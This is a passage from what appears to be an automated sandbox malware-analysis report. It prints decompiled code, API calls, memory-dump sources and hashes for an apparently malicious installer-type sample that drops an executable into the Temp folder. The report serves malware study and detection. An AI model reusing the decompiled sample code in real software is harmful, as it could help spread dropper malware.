												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                    0x004026ec
                    0x004026ee
                    0x004026f1
                    0x004026f3
                    0x004026f6
                    0x004026fb
                    0x004026ff
                    0x00402702
                    0x00402705
                    0x00402c2a
                    0x00402c2d
                    0x0040270b
                    0x0040270b
                    0x00402712
                    0x00402714
                    0x00402714
                    0x0040271a
                    0x0040287e
                    0x0040287e
                    0x00402881
                    0x00402886
                    0x004015b6
                    0x0040292e
                    0x0040292e
                    0x00000000
                    0x00402720
                    0x00402721
                    0x0040272c
                    0x0040272f
                    0x0040273b
                    0x0040273f
                    0x004027d7
                    0x004027ef
                    0x004027ff
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402745
                    0x00402745
                    0x00402748
                    0x00402749
                    0x0040274c
                    0x00402751
                    0x00402758
                    0x00402760
                    0x00000000
                    0x00402766
                    0x00402766
                    0x0040276b
                    0x00000000
                    0x00402771
                    0x00402771
                    0x00402779
                    0x0040277c
                    0x0040277f
                    0x0040283a
                    0x00402841
                    0x00402785
                    0x0040278b
                    0x00402797
                    0x00402801
                    0x00402801
                    0x00402799
                    0x00402799
                    0x0040279c
                    0x0040279e
                    0x0040279e
                    0x0040279e
                    0x004027a1
                    0x004027a6
                    0x004027a9
                    0x00000000
                    0x00000000
                    0x004027ab
                    0x004027ae
                    0x004027bc
                    0x004027c2
                    0x004027d0
                    0x00000000
                    0x004027d2
                    0x00000000
                    0x004027d2
                    0x00000000
                    0x004027d0
                    0x0040279e
                    0x00402804
                    0x00402807
                    0x00000000
                    0x00402809
                    0x0040280e
                    0x0040284f
                    0x00402871
                    0x00402878
                    0x0040285d
                    0x0040285d
                    0x00402860
                    0x00402863
                    0x00402866
                    0x00402866
                    0x00000000
                    0x00402817
                    0x00402817
                    0x0040281a
                    0x0040281d
                    0x00402823
                    0x00402827
                    0x0040282a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040282a
                    0x0040280e
                    0x00402807
                    0x0040277f
                    0x0040276b
                    0x00402760
                    0x00000000
                    0x0040282c
                    0x0040282c
                    0x0040282f
                    0x00402838
                    0x00000000
                    0x0040272f
                    0x0040271a
                    0x00402c33
                    0x00402c39

                    APIs
                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                      • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: File$Pointer$ByteCharMultiWide$Read
                    • String ID: 9
                    • API String ID: 163830602-2366072709
                    • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                    • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
                    • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                    • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004056D0 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004056D0(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a84;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8b54;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
					}
					_t27 = lstrlenW(0x7a0f68);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f68;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f68[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f68, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                    0x004056d6
                    0x004056e0
                    0x004056e5
                    0x004056eb
                    0x004056f6
                    0x004056f9
                    0x004056fc
                    0x00405702
                    0x00405702
                    0x00405708
                    0x00405710
                    0x00405713
                    0x00405730
                    0x00405734
                    0x0040573d
                    0x0040573d
                    0x00405747
                    0x00405750
                    0x0040575c
                    0x00405763
                    0x00405767
                    0x0040576a
                    0x0040577d
                    0x0040578b
                    0x0040578b
                    0x0040578f
                    0x00405791
                    0x00405794
                    0x00000000
                    0x00405794
                    0x00405715
                    0x0040571d
                    0x00405725
                    0x0040572b
                    0x00000000
                    0x0040572b
                    0x00405725
                    0x00405713
                    0x004057a0

                    APIs
                    • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                    • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                    • lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                    • SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                      • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                      • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSendlstrlen$lstrcat$TextWindow
                    • String ID:
                    • API String ID: 1495540970-0
                    • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                    • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
                    • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                    • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004068F5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E004068F5(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                    0x004068f7
                    0x00406900
                    0x00406917
                    0x00406917
                    0x0040691e
                    0x0040692a
                    0x0040692a
                    0x0040692d
                    0x00406930
                    0x00406935
                    0x00406937
                    0x00406940
                    0x00406944
                    0x00406961
                    0x00406969
                    0x00406969
                    0x0040696e
                    0x00406970
                    0x00406973
                    0x00406978
                    0x00406979
                    0x0040697d
                    0x0040697d
                    0x0040697e
                    0x00406985
                    0x00406987
                    0x0040698e
                    0x00000000
                    0x00000000
                    0x00406996
                    0x0040699c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040699c
                    0x004069a1

                    APIs
                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
                    • CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
                    • CharNextW.USER32(?,00000000,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
                    • CharPrevW.USER32(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 589700163-2982765560
                    • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                    • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
                    • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                    • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x79f73c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x79f73c = 0;
					return _t15;
				}
				if( *0x79f73c != 0) {
					return E00406A77(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x7a8aac) {
					if( *0x7a8aa8 == 0) {
						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
						 *0x79f73c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x7a8b54 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056D0(0,  &_v132);
					}
				}
				return _t6;
			}







                    0x0040303d
                    0x0040303f
                    0x00403046
                    0x00403049
                    0x00403049
                    0x0040304f
                    0x00000000
                    0x0040304f
                    0x0040305d
                    0x00000000
                    0x00403060
                    0x00403067
                    0x00403073
                    0x0040307b
                    0x004030b9
                    0x004030c2
                    0x00000000
                    0x004030c7
                    0x00403084
                    0x00403095
                    0x00000000
                    0x004030a3
                    0x00403084
                    0x004030cf

                    APIs
                    • DestroyWindow.USER32(?,00000000), ref: 00403049
                    • GetTickCount.KERNEL32 ref: 00403067
                    • wsprintfW.USER32 ref: 00403095
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                      • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                      • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                    • CreateDialogParamW.USER32 ref: 004030B9
                    • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                      • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                    • String ID: ... %d%%
                    • API String ID: 722711167-2449383134
                    • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                    • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
                    • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                    • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404F85 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                    0x00404f93
                    0x00404fa0
                    0x00404fa6
                    0x00404fe4
                    0x00404fe4
                    0x00404ff3
                    0x00404ffa
                    0x00000000
                    0x00404ffc
                    0x00404fa8
                    0x00404fb7
                    0x00404fbf
                    0x00404fc2
                    0x00404fd4
                    0x00404fda
                    0x00404fe1
                    0x00000000
                    0x00404fe1
                    0x00000000

                    APIs
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
                    • GetMessagePos.USER32 ref: 00404FA8
                    • ScreenToClient.USER32 ref: 00404FC2
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                    • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x7a8ab0 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                    0x00402fa3
                    0x00402fb1
                    0x00402fb7
                    0x00402fb7
                    0x00402fc5
                    0x00402fc7
                    0x00402fd3
                    0x00402fd8
                    0x00402fda
                    0x00402fda
                    0x00402fe5
                    0x00402ff5
                    0x00403007
                    0x00403007
                    0x0040300f

                    APIs
                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                    • wsprintfW.USER32 ref: 00402FE5
                    • SetWindowTextW.USER32(?,?), ref: 00402FF5
                    • SetDlgItemTextW.USER32 ref: 00403007
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                    • API String ID: 1451636040-1158693248
                    • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                    • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
                    • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                    • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FB4(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406139(_t55);
				_t29 = E0040615E(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x7a8ab4;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035FE(_t49);
							E004035E8(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
